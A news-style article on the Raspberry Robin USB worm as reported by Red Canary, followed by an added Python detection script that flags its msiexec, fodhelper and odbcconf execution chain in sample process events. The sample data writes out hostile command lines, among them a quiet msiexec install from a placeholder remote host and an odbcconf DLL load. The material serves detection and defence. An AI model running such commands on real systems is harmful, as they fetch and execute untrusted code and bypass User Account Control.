Malware is malicious software that can cause serious trouble if our computers are not adequately protected against it. Not all malware is alike: it does not all attack the same way, and it does not all pursue the same goal. That is precisely the concern raised by the discovery of this new malware, which Red Canary tracks under the name Raspberry Robin, since so far it has not been possible to determine what it was designed to do.
Malware tracked as Raspberry Robin
Researchers at the respected firm Red Canary were the ones who discovered it. Red Canary tracks the activity under the name Raspberry Robin; the actor behind it has not been identified. Rather than reaching Windows machines directly over the network, it spreads via external USB drives like a worm, the term for malware that propagates by copying itself onto other systems or media.
Infection starts with a malicious .LNK (shortcut) file on the USB drive: once the drive is connected and the shortcut is run, a cmd.exe process reads and executes the file. To reach its command-and-control (C2) servers, the systems from which the operators direct the malware, the worm then abuses Microsoft Standard Installer (msiexec.exe), a legitimate signed Windows binary, to fetch its next stage. According to Red Canary's report, the servers were hosted on compromised QNAP devices (network-attached storage appliances that stay permanently connected to the network), and TOR exit nodes were used as additional C2 infrastructure.
The point of this chain is to ride on an ordinary package-installation process in order to "deliver" the malware in a single step, and it has worked: the worm has already been detected on several business networks.
Its goal is still a mystery
As noted at the outset, what most troubles the researchers who discovered this malicious software is that they have not yet been able to determine what it was designed for. In the firm's own words:
In the absence of additional information on subsequent activity and final stages, it is difficult to draw any conclusions about the goal(s) of these types of campaigns.
It should also be noted that the software leaves behind a malicious DLL installed on the system. DLLs (dynamic-link libraries) are legitimate and useful in themselves: they are simply pieces of program code, stored in a system directory, that other programs load to perform various functions. Red Canary also does not know why this file is installed, although everything indicates it is there to provide persistence on the infected computer, so that the infection survives reboots.
To run this DLL, Raspberry Robin uses two utilities built into Windows: fodhelper.exe (the Features on Demand helper used to manage optional Windows features) and odbcconf.exe (a command-line tool for configuring ODBC drivers). The former is abused to bypass User Account Control, since it runs with elevated privileges without prompting the user; the latter is used to load and run the DLL itself. Neither binary normally spawns child processes or loads DLLs from user-writable directories during ordinary use, which is what makes this chain detectable.
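As an added example, not code from the article or from Red Canary, the following Python script turns the behaviours described above (cmd.exe executing a .LNK, msiexec.exe fetching a remote package, fodhelper.exe spawning a child, odbcconf.exe loading a DLL) into four detection checks and runs them over constructed process-creation events. The event fields mimic Sysmon event ID 1 / EDR telemetry; the PIDs, paths, host name and the exact parent-child order in the sample are invented for illustration and are not indicators from the report.

```python
"""Detection checks for the Raspberry Robin execution chain (added example)."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (shape of Sysmon event ID 1 / EDR telemetry)."""
    pid: int
    ppid: int
    image: str    # full path of the started binary
    cmdline: str  # its command line


# Constructed sample telemetry. PIDs, paths and the host name are placeholders;
# the lineage (cmd -> msiexec -> fodhelper -> odbcconf) is assumed, not from the report.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe", r'cmd /R "E:\recovery.lnk"'),
    ProcEvent(300, 200, r"C:\Windows\System32\msiexec.exe",
              "msiexec /q /i http://nas.example.invalid:8080/pkg.msi"),
    ProcEvent(400, 300, r"C:\Windows\System32\fodhelper.exe", "fodhelper.exe"),
    ProcEvent(500, 400, r"C:\Windows\System32\odbcconf.exe",
              r"odbcconf /a {regsvr C:\ProgramData\x\loader.dll}"),
    # Benign activity, to show the rules do not fire on every msiexec or process.
    ProcEvent(600, 100, r"C:\Windows\System32\msiexec.exe",
              r'msiexec /i "C:\Users\me\Downloads\tool.msi"'),
    ProcEvent(700, 100, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


# Each rule sees the event and its parent (None if the parent was not logged).
Rule = Callable[[ProcEvent, Optional[ProcEvent]], bool]


def rule_cmd_executes_lnk(ev: ProcEvent, parent: Optional[ProcEvent]) -> bool:
    # Noisy on its own, but it is the first link the article describes.
    return _basename(ev.image) == "cmd.exe" and ".lnk" in ev.cmdline.lower()


def rule_msiexec_remote_package(ev: ProcEvent, parent: Optional[ProcEvent]) -> bool:
    # msiexec installing straight from a URL is the download step of the chain.
    return (_basename(ev.image) == "msiexec.exe"
            and re.search(r"https?://", ev.cmdline, re.I) is not None)


def rule_fodhelper_spawns_child(ev: ProcEvent, parent: Optional[ProcEvent]) -> bool:
    # fodhelper.exe auto-elevates; a child process under it is the UAC-bypass payload.
    return parent is not None and _basename(parent.image) == "fodhelper.exe"


def rule_odbcconf_loads_dll(ev: ProcEvent, parent: Optional[ProcEvent]) -> bool:
    # odbcconf /a {regsvr <dll>} loads an arbitrary DLL via a signed Windows binary.
    return (_basename(ev.image) == "odbcconf.exe"
            and re.search(r"[/-]a\s*\{\s*regsvr\b", ev.cmdline, re.I) is not None)


RULES: Dict[str, Rule] = {
    "cmd_executes_lnk": rule_cmd_executes_lnk,
    "msiexec_remote_package": rule_msiexec_remote_package,
    "fodhelper_spawns_child": rule_fodhelper_spawns_child,
    "odbcconf_loads_dll": rule_odbcconf_loads_dll,
}


def evaluate(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, rule_name) for every event that trips a rule."""
    by_pid = {e.pid: e for e in events}
    hits: List[Tuple[int, str]] = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        for name, pred in RULES.items():
            if pred(ev, parent):
                hits.append((ev.pid, name))
    return hits


def ancestry(events: List[ProcEvent], pid: int) -> List[str]:
    """Walk ppid links upward and return image basenames root-first, for triage context."""
    by_pid = {e.pid: e for e in events}
    chain: List[str] = []
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(_basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return list(reversed(chain))


if __name__ == "__main__":
    for pid, name in evaluate(SAMPLE_EVENTS):
        print(f"{name:24s} pid={pid}  {' -> '.join(ancestry(SAMPLE_EVENTS, pid))}")
```

On the sample, the benign local msiexec install and notepad produce no hits, while the constructed chain trips all four rules; in practice the single cmd/.LNK rule is too noisy to alert on alone, so it is best used as context that raises the severity of the msiexec, fodhelper and odbcconf hits that follow it in the same ancestry.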